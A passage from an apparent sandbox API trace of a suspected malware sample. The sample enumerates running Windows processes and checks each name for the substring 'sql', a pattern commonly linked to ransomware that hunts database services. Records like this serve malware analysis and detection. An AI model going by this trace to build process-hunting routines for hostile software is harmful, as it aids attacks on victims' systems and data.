lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 11 [0091.199] lstrcpyA (in: lpString1=0x567fabc, lpString2="sihost.exe" | out: lpString1="sihost.exe") returned="sihost.exe" [0091.199] StrStrIA (lpFirst="sihost.exe", lpSrch="sql") returned 0x0 [0091.199] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0091.200] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.200] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35591a8 [0091.200] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35591a8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0091.200] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0091.200] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0091.200] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0091.201] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0091.201] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x35595c8 [0091.201] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x35595c8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0091.201] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0091.201] StrStrIA (lpFirst="taskhostw.exe", lpSrch="sql") returned 0x0 [0091.201] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0091.203] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0091.203] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35594d8 [0091.203] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x35594d8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 13 [0091.203] lstrcpyA (in: lpString1=0x567fabc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0091.203] StrStrIA (lpFirst="explorer.exe", lpSrch="sql") returned 0x0 [0091.203] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0091.204] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0091.204] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x355b738 [0091.204] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x355b738, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 21 [0091.204] lstrcpyA (in: lpString1=0x567fabc, lpString2="OfficeClickToRun.exe" | out: lpString1="OfficeClickToRun.exe") returned="OfficeClickToRun.exe" [0091.204] StrStrIA (lpFirst="OfficeClickToRun.exe", lpSrch="sql") returned 0x0 [0091.204] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0091.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0091.205] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x355c880 [0091.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x355c880, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SecurityHealthService.exe", lpUsedDefaultChar=0x0) returned 26 [0091.205] lstrcpyA (in: lpString1=0x567fabc, lpString2="SecurityHealthService.exe" | out: lpString1="SecurityHealthService.exe") returned="SecurityHealthService.exe" [0091.206] StrStrIA (lpFirst="SecurityHealthService.exe", lpSrch="sql") returned 0x0 [0091.206] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0091.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0091.209] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x355b498 [0091.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x355b498, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Memory Compression", lpUsedDefaultChar=0x0) returned 19 [0091.209] lstrcpyA (in: lpString1=0x567fabc, lpString2="Memory Compression" | out: lpString1="Memory Compression") returned="Memory Compression" [0091.209] StrStrIA (lpFirst="Memory Compression", lpSrch="sql") returned 0x0 [0091.209] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0091.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0091.210] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x355b4b8 [0091.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x355b4b8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 24 [0091.210] lstrcpyA (in: lpString1=0x567fabc, lpString2="ShellExperienceHost.exe" | out: lpString1="ShellExperienceHost.exe") returned="ShellExperienceHost.exe" [0091.210] StrStrIA (lpFirst="ShellExperienceHost.exe", lpSrch="sql") returned 0x0 [0091.210] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0091.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0091.212] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3559520 [0091.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x3559520, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 13 [0091.212] lstrcpyA (in: lpString1=0x567fabc, lpString2="SearchUI.exe" | out: lpString1="SearchUI.exe") returned="SearchUI.exe" [0091.212] StrStrIA (lpFirst="SearchUI.exe", lpSrch="sql") returned 0x0 [0091.212] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0091.213] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0091.213] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x355b638 [0091.213] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x355b638, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 18 [0091.213] lstrcpyA (in: lpString1=0x567fabc, lpString2="RuntimeBroker.exe" | out: lpString1="RuntimeBroker.exe") returned="RuntimeBroker.exe" [0091.213] StrStrIA (lpFirst="RuntimeBroker.exe", lpSrch="sql") returned 0x0 [0091.214] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0091.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0091.215] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35594c0 [0091.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x35594c0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0091.215] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0091.215] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="sql") returned 0x0 [0091.215] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pending.exe")) returned 1 [0091.216] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.216] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3559448 [0091.216] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x3559448, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pending.exe", lpUsedDefaultChar=0x0) returned 12 [0091.216] lstrcpyA (in: lpString1=0x567fabc, lpString2="pending.exe" | out: lpString1="pending.exe") returned="pending.exe" [0091.216] StrStrIA (lpFirst="pending.exe", lpSrch="sql") returned 0x0 [0091.216] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="appointmentimpressed.exe")) returned 1 [0091.217] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0091.217] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x355c948 [0091.217] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x355c948, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="appointmentimpressed.exe", lpUsedDefaultChar=0x0) returned 25 [0091.217] lstrcpyA (in: lpString1=0x567fabc, lpString2="appointmentimpressed.exe" | out: lpString1="appointmentimpressed.exe") returned="appointmentimpressed.exe" [0091.218] StrStrIA (lpFirst="appointmentimpressed.exe", lpSrch="sql") returned 0x0 [0091.218] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="swing prefer.exe")) returned 1 [0091.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0091.219] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x355b5b8 [0091.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x355b5b8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="swing prefer.exe", lpUsedDefaultChar=0x0) returned 17 [0091.219] lstrcpyA (in: lpString1=0x567fabc, lpString2="swing prefer.exe" | out: lpString1="swing prefer.exe") returned="swing prefer.exe" [0091.219] StrStrIA (lpFirst="swing prefer.exe", lpSrch="sql") returned 0x0 [0091.219] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="vietnamese_mature_hat.exe")) returned 1 [0091.220] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0091.220] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x355c600 [0091.220] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x355c600, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vietnamese_mature_hat.exe", lpUsedDefaultChar=0x0) returned 26 [0091.220] lstrcpyA (in: lpString1=0x567fabc, lpString2="vietnamese_mature_hat.exe" | out: lpString1="vietnamese_mature_hat.exe") returned="vietnamese_mature_hat.exe" [0091.220] StrStrIA (lpFirst="vietnamese_mature_hat.exe", lpSrch="sql") returned 0x0 [0091.220] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="nights-attending.exe")) returned 1 [0091.221] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0091.221] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x355b758 [0091.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x355b758, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nights-attending.exe", lpUsedDefaultChar=0x0) returned 21 [0091.222] lstrcpyA (in: lpString1=0x567fabc, lpString2="nights-attending.exe" | out: lpString1="nights-attending.exe") returned="nights-attending.exe" [0091.222] StrStrIA (lpFirst="nights-attending.exe", lpSrch="sql") returned 0x0 [0091.222] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="installed.exe")) returned 1 [0091.223] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0091.223] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x35594f0 [0091.223] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x35594f0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="installed.exe", lpUsedDefaultChar=0x0) returned 14 [0091.223] lstrcpyA (in: lpString1=0x567fabc, lpString2="installed.exe" | out: lpString1="installed.exe") returned="installed.exe" [0091.223] StrStrIA (lpFirst="installed.exe", lpSrch="sql") returned 0x0 [0091.223] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="references compounds.exe")) returned 1 [0091.224] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0091.224] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x355c6f0 [0091.225] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x355c6f0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="references compounds.exe", lpUsedDefaultChar=0x0) returned 25 [0091.225] lstrcpyA (in: lpString1=0x567fabc, lpString2="references compounds.exe" | out: lpString1="references compounds.exe") returned="references compounds.exe" [0091.225] StrStrIA (lpFirst="references compounds.exe", lpSrch="sql") returned 0x0 [0091.225] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="albuquerque_left.exe")) returned 1 [0091.226] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0091.226] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x355b778 [0091.226] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x355b778, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="albuquerque_left.exe", lpUsedDefaultChar=0x0) returned 21 [0091.226] lstrcpyA (in: lpString1=0x567fabc, lpString2="albuquerque_left.exe" | out: lpString1="albuquerque_left.exe") returned="albuquerque_left.exe" [0091.226] StrStrIA (lpFirst="albuquerque_left.exe", lpSrch="sql") returned 0x0 [0091.226] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="registered try.exe")) returned 1 [0091.227] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0091.227] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x355b4d8 [0091.227] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x355b4d8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="registered try.exe", lpUsedDefaultChar=0x0) returned 19 [0091.227] lstrcpyA (in: lpString1=0x567fabc, lpString2="registered try.exe" | out: lpString1="registered try.exe") returned="registered try.exe" [0091.227] StrStrIA (lpFirst="registered try.exe", lpSrch="sql") returned 0x0 [0091.227] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="consultancy statute ide.exe")) returned 1 [0091.228] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0091.228] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x355c920 [0091.228] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x355c920, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="consultancy statute ide.exe", lpUsedDefaultChar=0x0) returned 28 [0091.229] lstrcpyA (in: lpString1=0x567fabc, lpString2="consultancy statute ide.exe" | out: lpString1="consultancy statute ide.exe") returned="consultancy statute ide.exe" [0091.229] StrStrIA (lpFirst="consultancy statute ide.exe", lpSrch="sql") returned 0x0 [0091.229] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x67c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="invite.exe")) returned 1 [0091.230] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0091.230] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35595b0 [0091.230] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x35595b0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="invite.exe", lpUsedDefaultChar=0x0) returned 11 [0091.230] lstrcpyA (in: lpString1=0x567fabc, lpString2="invite.exe" | out: lpString1="invite.exe") returned="invite.exe" [0091.230] StrStrIA (lpFirst="invite.exe", lpSrch="sql") returned 0x0 [0091.230] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="idol.exe")) returned 1 [0091.231] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0091.231] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3559538 [0091.231] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x3559538, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="idol.exe", lpUsedDefaultChar=0x0) returned 9 [0091.231] lstrcpyA (in: lpString1=0x567fabc, lpString2="idol.exe" | out: lpString1="idol.exe") returned="idol.exe" [0091.231] StrStrIA (lpFirst="idol.exe", lpSrch="sql") returned 0x0 [0091.231] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="latitude qualifications.exe")) returned 1 [0091.232] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0091.232] LocalAlloc 